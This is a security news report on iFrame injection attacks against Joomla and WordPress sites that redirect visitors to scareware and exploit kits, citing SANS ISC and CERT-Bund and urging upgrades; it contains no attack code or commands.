Joomla, WordPress Sites Hit by IFrame Injection Attacks

Users of the popular Joomla content management system are being urged by security experts to upgrade to the latest version after reports of exploits being used to compromise websites built on the platform.

Users of the popular Joomla content management system are being urged by security experts to upgrade to the latest version after reports of exploits being used to compromise websites built on the platform.

The SANS Internet Storm Center received numerous reports that Joomla sites, as well as WordPress sites, had been compromised and iFrames had been injected that were pointing visitors to malicious sites.

“The interesting thing to note is that it doesn’t seem to be a scanner exploiting one vulnerability, but some tool that’s basically firing a bunch of Joomla and WordPress exploits at a given server and hoping something hits,” said ISC handler John Bambenek.

Joomla sites built with extensions were, in particular, being exploited, Bambenek said.

The ISC report identified a pair of IP addresses, 78.157.192.72 and 108.174.52.38, as the biggest offenders. The exploits, Bambenek said, were loading scareware on victims’ computers.

German security and tech site The H reports that the German Computer Emergency Response Team (CERT-Bund) also confirmed attacks emanating from Joomla sites. CERT-Bund said the iFrame points visitors to a Sutra Traffic Distribution System that eventually lands them on a site hosting an exploit kit.  

In September, Joomla warned of a series of automated attacks against the Joomla Content Editor versions 2.0.11 and earlier that were infecting websites with malicious content. The attacks were dropping malicious GIF images; attackers were able to attack the front end without authentication, Joomla said at the time in an advisory.

The GIF is a PHP shell which gives the attacker a launchpad for further Java exploits such as redirecting visitors to a malicious site, spam or phishing attacks, or unauthorized database access.

The H added that the use of the traffic redistribution systems, which are channels used by attackers that buy and sell Web traffic. Visitors clicking on a particular link would be redirected by the TDS to the vendor, which would sell the traffic to the attacker in this case.

Suggested articles

Necurs-Based DDE Attacks Now Spreading Locky Ransomware

Researchers have spotted Locky ransomware infections emanating from the Necurs botnet via Word attachments using a DDE technique that Microsoft says is an Office feature and does not merit a security patch.